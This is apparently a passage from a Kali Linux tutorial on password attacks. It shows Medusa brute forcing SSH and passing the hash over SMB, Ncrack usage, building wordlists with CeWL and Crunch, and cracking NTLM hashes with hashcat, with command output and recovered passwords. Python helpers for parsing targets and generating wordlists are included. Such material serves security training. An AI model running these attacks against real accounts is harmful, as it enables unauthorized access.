ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: computer (9 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: Th3B@sics (10 of 3546 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.18.132 User: ownedb Password: Th3B@sics [SUCCESS]
root@bt:~#

Using Medusa to brute force an SSH login

The first line of the output echoes the command and Medusa's version. Each ACCOUNT CHECK line that follows is one login attempt against the account ownedb with the next password from the dictionary, starting with 123456; a line without a result is a failed attempt. Notice that on the tenth attempt Medusa reports ACCOUNT FOUND: the password for ownedb is Th3B@sics, and you can now log in to the system over SSH with that username and password. More information on Medusa and its modules is available at:

http://h.foofus.net

Using Medusa for Pass-the-Hash

If you have captured NTLM hashes, for example by dumping the SAM database with pwdump, Medusa's smbnt module can authenticate with the hash itself instead of the cleartext password (pass the hash). With a file of target hosts and the pwdump output used as the combo file, the command is:

#medusa -H hosts.txt -C pwdump.txt -M smbnt -m PASS:HASH

To display the options accepted by a particular module (here smbnt; the same works for ssh and the others), query the module with -q:

#medusa -M smbnt -q

Ncrack - Network Authentication Cracking Tool

Ncrack is a high-speed network authentication cracking tool developed by the people behind the Nmap scanner. It was built to help organizations audit all of their hosts and network devices for weak passwords before an attacker does, and security professionals use it for the same purpose when testing clients. Where Nmap finds the hosts and the open ports (an SSH service, say), Ncrack tests the authentication of the services on them.

Ncrack was designed with a modular approach, a command-line syntax very similar to Nmap's, and a dynamic engine that adapts its behaviour to feedback from the network. This allows rapid yet reliable large-scale auditing of many hosts at once.

Its features include a very flexible interface that gives the user full control of network operations, allowing very sophisticated brute-forcing attacks, timing templates for ease of use (as in Nmap), and runtime interaction similar to Nmap's. Supported protocols include:

RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet

Every parameter has a default value (default parameter) that suits most cases, so you only tune what you need. The modular architecture means support for further protocols can be added as new modules.

http://nmap.org/ncrack/

Ncrack can be launched from the Kali menu: Applications | Kali Linux | Password Attacks | Online Attacks | Ncrack. Its basic syntax is:

#ncrack [<Options>] {<target specification>}



$ ncrack 10.0.0.130:21 192.168.1.2:22

Starting Ncrack 0.01ALPHA ( http://ncrack.org ) at 2009-07-24 23:05 EEST

Discovered credentials for ftp on 10.0.0.130 21/tcp:
10.0.0.130 21/tcp ftp: admin hello1

Discovered credentials for ssh on 192.168.1.2 22/tcp:
192.168.1.2 22/tcp ssh: guest 12345
192.168.1.2 22/tcp ssh: admin money$

Ncrack done: 2 services scanned in 156.03 seconds.
Ncrack finished.



The most commonly used options are:

-U <file>: file containing usernames, one per line.
-P <file>: file containing passwords, one per line.
--user <name1>[,<name2>...]: usernames given directly on the command line.
--pass <pass1>[,<pass2>...]: passwords given directly on the command line.
--passwords-first: iterate over the whole password list for each username, instead of the whole username list for each password.
-V: print the version number.
-6: enable IPv6 cracking.

Target Specification

Everything on the Ncrack command line that is not an option (or an option's argument) is treated as a target host specification. Ncrack takes hostnames, IP addresses, networks and so on, using the same syntax that Nmap uses, so what you have learned for Nmap applies here.

Ncrack handles multiple hosts in one run, and host ranges can be written as lists and ranges of octets or in CIDR-style addressing, as in the following example (the services to attack are given with -p, explained below):

#ncrack scanme.nmap.org 192.168.0.0/8 10.0.0,1,3-7.- -p22

Targets can also be read from files, and hosts can be excluded, with the following options:

-iX <inputfilename> (Input from Nmap's -oX XML output format)
Reads the targets from a file in the XML format that Nmap produces with -oX.

-iN <inputfilename> (Input from Nmap's -oN Normal output format)

-iL <inputfilename> (Input from list)
Reads the targets from a plain text list, one per line.

--exclude <host1>[,<host2>[,...]] (Exclude hosts/networks)

--excludefile <exclude_file> (Exclude list from file)
Same as --exclude, but the hosts or networks to skip are read from a file, one entry per line.

Service Specification

Ncrack has to know which services to attack on each host. If a target is given with neither a service name nor a port, Ncrack rejects it, since it cannot guess what to authenticate against. Service names and their default ports are resolved through Ncrack's ncrack-services file, so you may give either the service name or the port number (or both). Services can be specified in two ways:

1. per-host service specification
2. global specification

Per-host service specification

The service is attached to the target itself, which may still use wildcards or a netmask like any other target. The format is:

<[service-name]>://<target>:<[port-number]>

For example:

ncrack scanme.nmap.org:22 ftp://10.0.0.10 ssh://192.168.1.*

Global service specification

The -p option lists services that apply to all the targets on the command line that were not given a per-host service specification. The format is:

-p <[service1]>:<[port-number1]>,<[service2]>:<[port-number2]>,...

For example:

ncrack scanme.nmap.org 10.0.0.120-122 192.168.2.0/24 -p 22,ftp:3210,telnet

Apart from choosing which services to attack, Ncrack lets you tune the options of each service, such as the URL path for the HTTP module (module-specific parameters). These options can be given at three levels:

Per-host options, per-module options and global options

1. Per-host options

<[service-name]>://<target>:<[port-number]>,<opt1>=<optval1>,<opt2>=<optval2>,...

2. Per-module options

-m <service-name>:<opt1>=<optval1>,<opt2>=<optval2>,...

3. Global options

-g <opt1>=<optval1>,<opt2>=<optval2>,...

The options that can be set at any of these levels are:

ssl: enable SSL over this service
path: path-name used in modules like HTTP ('=' needs escaping if used)
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): delay time between each connection initiation
cr (connection retries): caps number of service connection attempts
to (time-out): maximum cracking time for service, regardless of success so far
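The two specification forms and the per-host option syntax above, as an added example that is not part of Ncrack or of the original text: a small parser that turns the command-line targets into concrete (host, service, port, options) entries the way the rules above describe, rejecting a host that carries neither a service nor a port. The default-port table is a constructed subset of ncrack-services, and the precedence (a per-host specification is used as given, -p applies to the remaining hosts) is my reading of the text above.

```python
"""Parser for Ncrack-style target and service specifications. Added
example, not Ncrack's code; DEFAULT_PORTS is a constructed subset of the
ncrack-services table and the precedence rule is an assumption."""
from dataclasses import dataclass, field

DEFAULT_PORTS = {"ftp": 21, "ssh": 22, "telnet": 23, "http": 80, "pop3": 110,
                 "https": 443, "smb": 445, "rdp": 3389, "vnc": 5900}
PORT_TO_SERVICE = {port: name for name, port in DEFAULT_PORTS.items()}
KNOWN_OPTIONS = {"ssl", "path", "cl", "CL", "at", "cd", "cr", "to"}


@dataclass
class Target:
    host: str
    service: str
    port: int
    options: dict = field(default_factory=dict)


def parse_options(items):
    """['cl=5', 'CL=10'] -> {'cl': '5', 'CL': '10'}; unknown names are errors."""
    options = {}
    for item in items:
        name, sep, value = item.partition("=")
        if not sep or name not in KNOWN_OPTIONS:
            raise ValueError(f"bad service option: {item!r}")
        options[name] = value
    return options


def split_host_spec(spec):
    """'ssh://10.0.0.5:2222,cl=5' -> (service|None, host, port|None, options)."""
    service = None
    if "://" in spec:
        service, spec = spec.split("://", 1)
    head, *option_items = spec.split(",")
    host, port = head, None
    if ":" in head:
        host, port_text = head.rsplit(":", 1)
        port = int(port_text)
    return service, host, port, parse_options(option_items)


def resolve(service, port):
    """Fill in whichever of service/port is missing from the default table."""
    if service is None and port is None:
        return None
    if service is None:
        if port not in PORT_TO_SERVICE:
            raise ValueError(f"no service known for port {port}")
        service = PORT_TO_SERVICE[port]
    if port is None:
        port = DEFAULT_PORTS[service]
    return service, port


def parse_global_services(arg):
    """-p '22,ftp:3210,telnet' -> [('ssh', 22), ('ftp', 3210), ('telnet', 23)]."""
    services = []
    for item in arg.split(","):
        name, sep, port_text = item.partition(":")
        if sep:
            services.append((name, int(port_text)))
        elif name.isdigit():
            services.append(resolve(None, int(name)))
        else:
            services.append(resolve(name, None))
    return services


def expand_targets(host_specs, global_services=""):
    """One Target per (host, service): a per-host spec is used as given,
    hosts without one get every -p service, and a host with neither is
    rejected, as Ncrack does."""
    fallback = parse_global_services(global_services) if global_services else []
    targets = []
    for spec in host_specs:
        service, host, port, options = split_host_spec(spec)
        resolved = resolve(service, port)
        if resolved:
            targets.append(Target(host, resolved[0], resolved[1], options))
        elif fallback:
            targets.extend(Target(host, s, p, dict(options)) for s, p in fallback)
        else:
            raise ValueError(f"{host}: no service or port specified")
    return targets


if __name__ == "__main__":
    for t in expand_targets(["10.0.0.120", "ssh://10.0.0.5:2222,cl=5,CL=10"],
                            "22,ftp:3210,telnet"):
        print(t)
```

The check that pays for itself is the rejection at the end of expand_targets: a host that slipped onto the command line without a service is an audit that silently never happens.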



Output

Ncrack can save its results in the same output formats that Nmap uses; pick one (or all of them) on the command line:

-oN <filespec> (normal output)

-oX <filespec> (XML output)

-oA <basename> (Output to all formats)

The full documentation is at:

http://nmap.org/ncrack/man.html
http://nmap.org/ncrack/devguide.html



Password Profiling (Word list or Dictionary file)

One of the most important inputs to any password attack, online or offline, is the dictionary (Dictionary list or Word List): a file of candidate passwords, one per line, that the attack tool tries in turn. Building a list that fits the target is called Password Profiling, and it often decides whether the attack succeeds at all.

A dictionary is only useful if the target's password is actually in it. The most valuable words are therefore the ones related to the target: if you learn that the user's dog is named Barfy, then Barfy and its variants belong in the list, along with names of family members and pets, birth dates, the company name, its products and anything else people tend to build passwords from. Such a targeted list is short, so it runs quickly and costs little effort, yet it is often more effective than a generic list of millions of words.

Most users do not pick a plain dictionary word, though: they add digits or symbols at the beginning or the end of the word, or capitalize its first letter. Good password attacks therefore combine the base words with numbers, years and symbols and try the common substitutions. Some tools go further and build the list from the words found on the target organization's own website, or from harvested e-mail addresses and employee names.

There are also very large generic word lists, collected from real password leaks on the Internet, that you can download; each leak gives a reliable picture of what people actually choose. Kali ships several ready-made lists under [/usr/share/wordlists], including the well-known "RockYou" list, which came from a real-world breach of the RockYou site:



root@Kali:/usr/share# cd wordlists/
root@Kali:/usr/share/wordlists# ls
rockyou.txt.gz
root@Kali:/usr/share/wordlists#



John the Ripper (JtR) also ships a small but useful list in [/usr/share/john/password.lst].

The WFUZZ web fuzzer provides Multiple Wordlists under /usr/share/wfuzz/wordlist/:

root@kali:/usr/share/wfuzz/wordlist# ls
fuzzdb  general  Injections  others  stress  vulns  webservices
root@kali:/usr/share/wfuzz/wordlist#



When it comes to password dictionaries, bigger is not always better. JtR's offline cracking speed depends on the hash type and on your hardware, and a huge list of random words takes a long time to run through for little gain; an online attack such as Medusa's is slower still, one network login per candidate. A list built around the target, even a small one, is far more likely to contain the right password within the first few thousand entries. Kali includes several tools for building your own wordlists: CeWL builds a custom list from the words on a target's website, and Crunch generates a list exhaustively from a character set or pattern of your choice.

CeWL (Password Profiling)

CeWL is a Ruby application that spiders a given URL to a specified depth, optionally following external links, and returns a list of words found on the site that can be fed to password crackers such as JtR. Words that appear on a company's web pages (product names, slogans, staff names) have a good chance of turning up in its users' passwords. For more information on CeWL, see the project page:

http://www.digininja.org/projects/cewl.php

Before using it, let's look at CeWL's options, which you get by running it without arguments. It can also be launched from the menu:

Applications | Kali Linux | Password Attacks | Online Attacks | CeWL
CeWL 5.3 Robin Wood (robin@digininja.org) (www.digininja.org)

/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': iconv will be deprecated in the future, use String#encode instead.
Usage: cewl [OPTION] ... URL
    --help, -h: show help
    --keep, -k: keep the downloaded file
    --depth x, -d x: depth to spider to, default 2
    --min_word_length, -m: minimum word length, default 3
    --offsite, -o: let the spider visit other sites
    --write, -w file: write the output to the file
    --ua, -u user-agent: useragent to send
    --no-words, -n: don't output the wordlist
    --meta, -a include meta data
    --meta_file file: output file for meta data
    --email, -e include email addresses
    --email_file file: output file for email addresses
    --meta-temp-dir directory: the temporary directory used by exiftool when parsing files, default /tmp
    --count, -c: show the count for each word found

    Authentication
    --auth_type: digest or basic
    --auth_user: authentication username
    --auth_pass: authentication password

    Proxy Support
    --proxy_host: proxy host
    --proxy_port: proxy port, default 8080
    --proxy_username: username for proxy, if required
    --proxy_password: password for proxy, if required



A typical run spiders the target site (add -o to let the spider follow links to other sites, and -d to change the depth) and writes the words it finds to a file with -w, ready for use as a dictionary:

#cewl [OPTION] ... URL

#cewl -w passwords.txt http://www.digininja.org/projects/cewl.php
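The word-harvesting step that CeWL performs, as an added example that is not CeWL's code: it strips the tags from an HTML page, counts the words of at least the minimum length (cewl -m and -c), pulls out e-mail addresses (cewl -e) and formats the lines for the -w file. The page it runs on is constructed inline so that it works offline; a real run fetches the target's pages and follows links to the chosen depth. Treating only letters as word characters is an assumption about CeWL's defaults.

```python
"""CeWL-style word and e-mail extraction from a page. Added example, not
CeWL's code; SAMPLE_HTML is constructed and the word regex is an assumption."""
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed page standing in for a fetched target site.
SAMPLE_HTML = """<html><head><title>Acme Widgets</title>
<meta name="author" content="Bob Example"></head>
<body><h1>Welcome to Acme Widgets</h1>
<p>Acme builds the WidgetMaster 3000. Contact sales@acme.example or
support@acme.example. Our mascot is Barfy the dog.</p>
<script>var token = "notawordlistentry";</script>
<a href="/about">About Acme</a></body></html>"""

WORD_RE = re.compile(r"[A-Za-z]+")             # letters only, assumed CeWL default
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


class TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def page_text(html):
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.chunks)


def extract_words(html, min_word_length=3):
    """Word -> occurrence count for words of at least min_word_length,
    case preserved, the way cewl -c reports them."""
    words = WORD_RE.findall(page_text(html))
    return Counter(w for w in words if len(w) >= min_word_length)


def extract_emails(html):
    """Addresses found anywhere in the raw page (cewl -e), deduplicated."""
    return sorted(set(EMAIL_RE.findall(html)))


def wordlist_lines(counts, with_counts=False):
    """Lines for the -w file, most frequent first; 'word, n' when -c style."""
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [f"{w}, {n}" if with_counts else w for w, n in ordered]


if __name__ == "__main__":
    counts = extract_words(SAMPLE_HTML)
    print("\n".join(wordlist_lines(counts, with_counts=True)))
    print("\n".join(extract_emails(SAMPLE_HTML)))
```

Script bodies are skipped on purpose: JavaScript identifiers inflate a wordlist with tokens nobody uses as a password. The e-mail addresses are the input for the username derivation shown with Medusa above.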



Crunch

Crunch is a wordlist generator: you give it a character set (or one of the named sets it ships with) and a minimum and maximum length, and it writes every possible combination to a file, ready to use as a password dictionary. Its full options are described in its manual page:

#man crunch

Crunch needs the minimum and maximum length of the words and the characters to build them from; if no characters are given it uses lowercase letters. Crunch also ships a file of named character sets, charset.lst, in [/usr/share/crunch]. We will use it below: instead of typing the characters you pass the path to charset.lst and the name of the set you want. Its contents are as follows:



# charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail.com>

hex-lower                       = [0123456789abcdef]
hex-upper                       = [0123456789ABCDEF]

numeric                         = [0123456789]
numeric-space                   = [0123456789 ]

symbols14                       = [!@#$%^&*()-_+=]
symbols14-space                 = [!@#$%^&*()-_+= ]

symbols-all                     = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space               = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

ualpha                          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space                    = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space            = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14         = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space   = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
ualpha-numeric-all              = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

lalpha                          = [abcdefghijklmnopqrstuvwxyz]
lalpha-space                    = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric                  = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space            = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14         = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space   = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all              = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space        = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

mixalpha                        = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space                  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
(listing truncated)



Let's start with the simplest use of crunch: all words of one to three characters from the default (lowercase) character set, written to ThreeLetters.txt. Crunch announces how much data it is about to write before it starts, which is worth reading before a large run:

root@JANA:~# crunch 1 3 -o ThreeLetters.txt
Crunch will now generate the following amount of data: 72384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 18278

100%
root@JANA:~#

The resulting file holds every combination of the 26 lowercase letters at lengths one to three, 18278 lines in all:

a, b, c, d, e, f, g, h, i, j, etc...

aa, ab, ac, ad, ae, af, ag, ah, ai, aj, etc...

aaa, aab, aac, aad, aae, aaf, aag, aah, aai, aaj, etc...

This is crunch in its most basic form: only the minimum and maximum length were given, so the default lowercase character set was used. A more precise list is obtained by giving crunch the character set yourself, as in the next example.
Here the words are three to four characters long and built only from the characters abcde1234:

root@JANA:~# crunch 3 4 abcde1234 -o ThreeLetters2.txt
Crunch will now generate the following amount of data: 35721 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 7290

100%
root@JANA:~#

The file contains every combination of the given characters at lengths three and four, such as aa1, bb3 and a212, starting with aaa and ending with 4444.

Another way is to use one of the predefined sets from /usr/share/crunch/charset.lst: pass the file with -f followed by the name of the set. Here crunch generates three- and four-character words from the hex-lower set into jana.txt:

root@JANA:~# crunch 3 4 -f /usr/share/crunch/charset.lst hex-lower -o jana.txt
Crunch will now generate the following amount of data: 344064 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 69632

100%
root@JANA:~#

A look at charset.lst shows what hex-lower stands for:

root@JANA:~# cat /usr/share/crunch/charset.lst
# charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail.com>

hex-lower = [0123456789abcdef]
hex-upper = [0123456789ABCDEF]
(listing truncated)

In this example we used the hex-lower set, that is, the characters 0123456789abcdef, so the first line of the output file is 000 and the last is ffff.

Crunch can also generate words that follow a pattern, using the -t switch. The pattern is written with placeholders: @ is replaced by a lowercase letter, , (comma) by an uppercase letter, % by a digit and ^ by a symbol, while any other character is kept as it is:

@: Inserts lowercase characters
%: Inserts numbers
,: Inserts uppercase characters
^: Inserts symbols

Suppose, for example, that you know the target's passwords are six characters long and begin with pass followed by two digits. Crunch can generate exactly those candidates, pass00 through pass99, into newpasslist.txt:

#crunch 6 6 -t pass%% -o newpasslist.txt
root@JANA:~# crunch 6 6 -t pass%% -o newpasslist.txt
Crunch will now generate the following amount of data: 700 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100

100%
root@JANA:~#

A look at the file crunch created shows the candidates it produced (only the first lines are shown):

root@JANA:~# cat newpasslist.txt
pass00
pass01
pass02
pass03
pass04
pass05
pass06
pass07
pass08
pass09
pass10
pass11
pass12
pass13
pass14
pass15
pass16
pass17
pass18
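The generation crunch performs in the examples above (length ranges over a character set, named sets read from charset.lst, and the -t pattern placeholders), as an added example that is not crunch's code. It reproduces the line and byte counts crunch announces, so you can size a list before writing it, which is the check worth making before a large run. The symbol set used for the ^ placeholder is an assumption, and the charset.lst excerpt is constructed from the entries shown above (the real file has more).

```python
"""Crunch-style wordlist generation and size estimation. Added example,
not crunch's code; SYMBOLS and CHARSET_LST_EXCERPT are constructed."""
from itertools import product

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SYMBOLS = "!@#$%^&*()-_+="          # assumed set for the ^ placeholder

# Constructed excerpt of /usr/share/crunch/charset.lst (same syntax).
CHARSET_LST_EXCERPT = """# charset configuration file for winrtgen v1.2
hex-lower     = [0123456789abcdef]
hex-upper     = [0123456789ABCDEF]
numeric       = [0123456789]
numeric-space = [0123456789 ]
"""

PLACEHOLDERS = {"@": LOWER, ",": UPPER, "%": DIGITS, "^": SYMBOLS}


def parse_charset_lst(text):
    """'name = [chars]' lines -> {name: chars}; '#' lines are comments."""
    sets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition("=")
        rest = rest.strip()
        if rest.startswith("[") and rest.endswith("]"):
            sets[name.strip()] = rest[1:-1]   # inner spaces are characters, keep them
    return sets


def generate(min_len, max_len, charset=LOWER):
    """Every string of length min_len..max_len over charset (crunch MIN MAX SET)."""
    for length in range(min_len, max_len + 1):
        for combo in product(charset, repeat=length):
            yield "".join(combo)


def generate_pattern(pattern, placeholders=PLACEHOLDERS):
    """crunch -t: fixed characters stay, placeholders expand position by position."""
    slots = [placeholders.get(ch, ch) for ch in pattern]
    for combo in product(*slots):
        yield "".join(combo)


def estimate(min_len, max_len, charset=LOWER):
    """(lines, bytes) crunch announces before writing: each line plus a newline."""
    lines = sum(len(charset) ** n for n in range(min_len, max_len + 1))
    size = sum(len(charset) ** n * (n + 1) for n in range(min_len, max_len + 1))
    return lines, size


def estimate_pattern(pattern, placeholders=PLACEHOLDERS):
    """Same figures for a -t pattern, whose words all have the pattern's length."""
    lines = 1
    for ch in pattern:
        lines *= len(placeholders.get(ch, ch))
    return lines, lines * (len(pattern) + 1)


if __name__ == "__main__":
    hex_lower = parse_charset_lst(CHARSET_LST_EXCERPT)["hex-lower"]
    print("crunch 3 4 -f charset.lst hex-lower ->", estimate(3, 4, hex_lower))
    with open("newpasslist.txt", "w") as fh:
        for word in generate_pattern("pass%%"):
            fh.write(word + "\n")
```

estimate(1, 3), estimate(3, 4, "abcde1234") and estimate(3, 4, hex_lower) return exactly the 18278/72384, 7290/35721 and 69632/344064 figures crunch printed above; the same arithmetic shows why an eight-character run over a mixed set is not something to write to disk.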



Download Wordlists from the Web

Large ready-made wordlists can be downloaded from the Internet. Two of the best-known sources are Skull Security and CrackStation:

Skull Security:
https://wiki.skullsecurity.org/Passwords

CrackStation:
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm



Hashcat and oclHashcat (Password Cracking with CUDA)

hashcat - advanced password recovery

Source: http://hashcat.net/wiki

Hashcat is a password recovery tool that works offline on hashes you have already obtained: it supports a large number of hash algorithms and several attack modes, and its authors present it as the fastest cracker available. It complements the techniques covered so far, online brute forcing with Medusa or Ncrack, rainbow tables and, where the hash alone is enough, pass the hash. Where those fail or are impractical, you dump the hashes and crack them with Hashcat on your own hardware, which is also far quieter than thousands of login attempts against a live service.

Using CUDA: what is CUDA?

CUDA (Compute Unified Device Architecture) is NVIDIA's parallel computing platform: it lets programs run general-purpose computations on the graphics processing unit (GPU) instead of only on the CPU. A GPU contains hundreds or thousands of small cores (CUDA cores on NVIDIA hardware) built to execute the same operation on many data items at once, which is exactly the shape of password cracking: the same hash function applied to millions of candidates.

4. CUDA Cracking

Computing hashes is embarrassingly parallel, so GPU cracking reaches speeds far beyond what a CPU can manage; the actual figure depends on the hash algorithm and on the card. The rest of this section shows the CPU version of Hashcat first and the GPU version, oclHashcat, at the end.



Hashcat and OclHashcat

Hashcat is the CPU-based version of the tool, while oclHashcat is the GPGPU-based version that runs on the graphics card (GPU). oclHashcat was released in two builds, oclHashcat-plus for AMD (OpenCL) cards and cudaHashcat-plus for NVIDIA (CUDA) cards. Both tools use multithreading: Hashcat spreads the work across the cores of the CPU, and oclHashcat across the hundreds of cores of the GPU, which is why the GPU version is so much faster; with a strong card it hashes many millions of candidates per second and needs only seconds for short passwords.

Hashcat/oclHashcat support the following attack modes:

Attack modes

- Brute-Force attack
- Combinator attack
- Dictionary attack
- Fingerprint attack
- Hybrid attack
- Mask attack
- Permutation attack
- Rule-based attack
- Table-Lookup attack
- Toggle-Case attack

The Hashcat tools appear in several places in the Kali menu, under both GPU Tools and Offline Attacks:

Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-lite
Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-plus
Applications | Kali Linux | Password Attacks | Offline Attacks | hashcat
Applications | Kali Linux | Password Attacks | Offline Attacks | oclhashcat-lite
Applications | Kali Linux | Password Attacks | Offline Attacks | oclhashcat-plus
We will look at Hashcat, the CPU version, first. Its options can be listed with "hashcat --help":

hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]

Options:

* General:

  -m,  --hash-type=NUM       Hash-type, see references below
  -a,  --attack-mode=NUM     Attack-mode, see references below
  -V,  --version             Print version
  -h,  --help                Print help
       --eula                Print EULA
       --expire              Print expiration date
       --quiet               Suppress output

Consider the following command:

#hashcat -m 1000 Easyhash.txt rockyou.txt -o cracked.txt

Here -m 1000 tells hashcat that the hashes are of type NTLM (Windows); Easyhash.txt is the file of hashes to crack, one per line; rockyou.txt is the dictionary to try against them; and -o cracked.txt writes the recovered hashes with their passwords to cracked.txt.



root@kali:~/Desktop# hashcat -m 1000 Easyhash.txt rockyou.txt -o cracked.txt
Initializing hashcat v0.44 by atom with 3 threads and 32mb segment-size...

Added hashes from file Easyhash.txt: 13 (1 salts)

NOTE: press enter for status-screen

All hashes have been recovered
root@kali:~/Desktop#

All 13 hashes were recovered. The results are not printed to the screen; they are in the output file, as hash:password pairs:

root@kali:~/Desktop# cat cracked.txt
b963c57010f218edc2cc3c229b5e4def:iloveyou
259745cb123a52aa2e693aaacca2db52:12345678
5835048ce94ad0564e29a924a03510ef:password1
5d95e3883afc84f1842f8b1c6d895fa4:jesus
f773c5db7ddebefa4b9dae7ee8c50aea:trustno1
6afd63afaebf74211010f02ba62a1b3e:elizabeth1
a4f49c406510bdcab6824ee7c30fdb52:Password
d5e2155516f1d7228392b90afd3cd539:Monkey
43fccfa6bae3d14b26427c26d09410ef:francis123
d1449b6c6122b1b1654ba39932465528:Administrator
9439b142f202437a55f7c52f6fcf82d3:luphu4ever
27c0555ea55ecfcdba01c022681dda3f:duodinamico
2e4dbf83aa056289935daea328977b20:P@$$word
root@kali:~/Desktop#
The RockYou list is a good start, but it is not exhaustive: it holds the passwords of one breach, and a password that is not in the list cannot be found by a dictionary run. Let's try a harder set of five NTLM hashes, saved in hash.txt:

31d6cfe0d16ae931b73c59d7e0c089c0
2e4dbf83aa056289935daea328977b20
d6e0a7e89da72150d11525e3f5b89dbe
317a96a1018609c20b4ccb69718ad6e7
2e520e18228ad8ea4060017234af43b2

The same command, this time against hash.txt, writing the results to hardcracked.txt:

#hashcat -m 1000 hash.txt rockyou.txt -o hardcracked.txt



This time only two of the five hashes are recovered, as the status screen shows:

Input.Mode: Dict (rockyou.txt)
Index.....: 5/5 (segment), 553095 (words), 5720149 (bytes)
Recovered.: 2/5 hashes, 0/1 salts
Speed/sec.: 6.86M plains, 6.86M words
Progress..: 553095/553095 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Tue Oct  1 14:53:03 2013
Stopped: Tue Oct  1 14:53:07 2013
root@kali:~/Desktop#

root@kali:~/Desktop# cat hardcracked.txt
31d6cfe0d16ae931b73c59d7e0c089c0:
2e4dbf83aa056289935daea328977b20:P@$$word

The first hash, 31d6cfe0d16ae931b73c59d7e0c089c0, is the NTLM hash of an empty password (note the empty field after the colon); it is worth memorizing, since it appears whenever an account has no password set. The other three hashes are simply not in RockYou. The next step is a much larger dictionary, the CrackStation list, available at:

https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

#hashcat -m 1000 hash.txt crackstation.txt -o hardcracked.txt --remove

Two things differ from the previous command. First, the dictionary is now crackstation.txt instead of rockyou.txt. Second, we added the --remove switch: hashcat deletes each hash from hash.txt as soon as it is cracked, so that after the run the file contains only the hashes still to be cracked, ready for the next attack.
Input.Mode: Dict (crackstation.txt)
Index.....: 468/468 (segment), 453373 (words), 23198376 (bytes)
Recovered.: 3/5 hashes, 0/1 salts
Speed/sec.: 6.94M plains, 6.94M words
Progress..: 453373/453373 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Tue Oct  1 20:11:32 2013
Stopped: Tue Oct  1 20:22:39 2013
root@kali:~/Crack#

root@kali:~/Crack# cat hardcracked.txt
31d6cfe0d16ae931b73c59d7e0c089c0:
d6e0a7e89da72150d11525e3f5b89dbe:MyNameIsBob
2e4dbf83aa056289935daea328977b20:P@$$word
root@kali:~/Crack#

Eleven minutes against the larger list recovered one more password, MyNameIsBob. The last two hashes are still uncracked; for those we turn to Hashcat's more advanced modes.



4. More advanced cracking

Beyond a straight dictionary run, Hashcat offers several ways to get more out of the same wordlists:

Multiple Wordlists
Rule Sets
Password Masks.

1. Attack type: the attack mode is chosen with the -a switch, which takes one of the following modes:

* Attack modes:

